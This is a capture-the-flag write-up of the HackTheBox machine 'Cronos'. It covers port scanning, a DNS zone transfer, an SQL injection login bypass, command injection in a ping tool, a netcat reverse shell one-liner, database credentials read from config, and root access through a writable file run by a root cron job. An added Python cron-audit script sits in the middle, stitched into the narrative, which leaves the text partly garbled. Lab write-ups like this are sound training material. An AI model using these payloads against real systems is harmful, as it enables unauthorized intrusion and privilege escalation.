hackthebox – cronos – linux

Starting with masscan

# masscan -e tun0 -p1-65535 --rate=1000

Starting masscan 1.0.6 (http://bit.ly/14GZzcT) at 2019-07-05 14:21:44 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 53/tcp on
Discovered open port 22/tcp on
Discovered open port 80/tcp on

Port 53 (DNS) is open. Let's see if the server allows a zone transfer.

# dig axfr @ cronos.htb

; <<>> DiG 9.11.4-2-Debian <<>> axfr @ cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.		604800	IN	NS	ns1.cronos.htb.
cronos.htb.		604800	IN	A
admin.cronos.htb.	604800	IN	A
ns1.cronos.htb.		604800	IN	A
www.cronos.htb.		604800	IN	A
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 155 msec
;; WHEN: Fri Jul 05 10:34:31 EDT 2019
;; XFR size: 7 records (messages 1, bytes 203)

The zone transfer reveals the hostnames cronos.htb, admin.cronos.htb and www.cronos.htb. Add them to /etc/hosts, mapped to the target's IP: cronos.htb admin.cronos.htb www.cronos.htb

Browse both domains.

(Screenshot: hackthebox – cronos – laravel)

… and the admin domain:

(Screenshot: hackthebox – cronos – admin)

Tried a few common login credentials and bypasses like admin/admin, guest/guest, etc., and finally SQLi, which worked.

Enter the following as the username; the password can be anything:

admin' OR 1=1 #

… and we are in.

(Screenshot: hackthebox – cronos – net tool)

Looks like someone made a net tool that runs traceroute and ping. We can try to inject a command by appending a second command to the input: ; ls

This worked and we were able to list files.

(Screenshot: hackthebox – cronos – command injection)

Let's get a shell.

Insert the following in place of ls:

;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f

We get the shell

# nc -lvnp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 44144
/bin/sh: 0: can't access tty; job control turned off
$ whoami

Upgrade the shell

Let's look around.

www-data@cronos:/var/www/admin$ cat config.php
   define('DB_SERVER', 'localhost');
   define('DB_USERNAME', 'admin');
   define('DB_PASSWORD', 'kEjdbRigfBHUREiNSDs');
   define('DB_DATABASE', 'admin');
www-data@cronos:/var/www/laravel$ cat .env


www-data@cronos:/home$ ls

We find a few passwords, and the user in /home is noulis.

Looking around, we find a cron job that root runs every minute.

* * * * *	root	php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

Looking at the permissions, the artisan script is owned by www-data, so we can write to it directly.

ls -lh /var/www/laravel/artisan
-rwxr-xr-x 1 www-data www-data 3.4K Jul  6 07:31 /var/www/laravel/artisan
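As a defensive check for exactly this misconfiguration, here is an added Python audit (not from the writeup or the box itself) that parses system-crontab lines and flags root jobs whose executed files are owned by a non-root user or are group/world writable. The file metadata is constructed to mirror the artisan case; uid 33 for www-data and the fake stat callback are assumptions so the check runs offline.

```python
import os
import re
import stat
from types import SimpleNamespace

_PATH_RE = re.compile(r"(?<![\w./-])(/[\w./-]+)")  # absolute paths in a command

def parse_system_cron(line):
    """Split an /etc/crontab-style line into (schedule, user, command), else None."""
    parts = line.strip().split(None, 6)
    if len(parts) < 7 or parts[0].startswith("#") or "=" in parts[0]:
        return None  # blank, comment, or VAR=value line
    return " ".join(parts[:5]), parts[5], parts[6]

def audit_cron_line(line, stat_fn=os.stat):
    """Return paths executed by a root cron job that a non-root user could alter."""
    parsed = parse_system_cron(line)
    if parsed is None or parsed[1] != "root":
        return []
    findings = []
    for path in _PATH_RE.findall(parsed[2]):
        if path.startswith("/dev/"):
            continue  # redirect targets such as /dev/null are not executed
        try:
            st = stat_fn(path)
        except OSError:
            continue  # path does not exist on this host
        others_write = st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)
        if st.st_uid != 0 or others_write:
            findings.append(path)  # non-root owner (www-data here) or g/o writable
    return findings

def audit_crontab(lines, stat_fn=os.stat):
    """Map each offending root job line to the writable paths it runs."""
    return {ln: hits for ln in lines if (hits := audit_cron_line(ln, stat_fn))}

def make_fake_stat(table):
    """Stat-like callback built from {path: (uid, mode)} so the check runs offline."""
    def _stat(path):
        if path not in table:
            raise FileNotFoundError(path)
        return SimpleNamespace(st_uid=table[path][0], st_mode=table[path][1])
    return _stat

# Constructed sample mirroring the writeup: artisan owned by www-data (uid 33), 0755.
SAMPLE_FILES = {"/var/www/laravel/artisan": (33, 0o100755), "/usr/bin/php": (0, 0o100755)}
SAMPLE_CRONTAB = [
    "SHELL=/bin/sh",
    "* * * * *\troot\tphp /var/www/laravel/artisan schedule:run >> /dev/null 2>&1",
    "17 *\t* * *\troot\tcd / && run-parts --report /etc/cron.hourly",
]
```

Run it against the real /etc/crontab with the default os.stat to find jobs where root executes something a lower-privileged account can rewrite.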

Replace artisan with Kali's /usr/share/webshells/php/php-reverse-shell.php, listen for the shell, and a root shell comes back when the cron job next fires.

# nc -lvnp 1234
listening on [any] 1234 ...
connect to [] from (UNKNOWN) [] 33728
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 18:40:01 up  3:45,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# python -c 'import pty;pty.spawn("/bin/bash")'
root@cronos:/# whoami
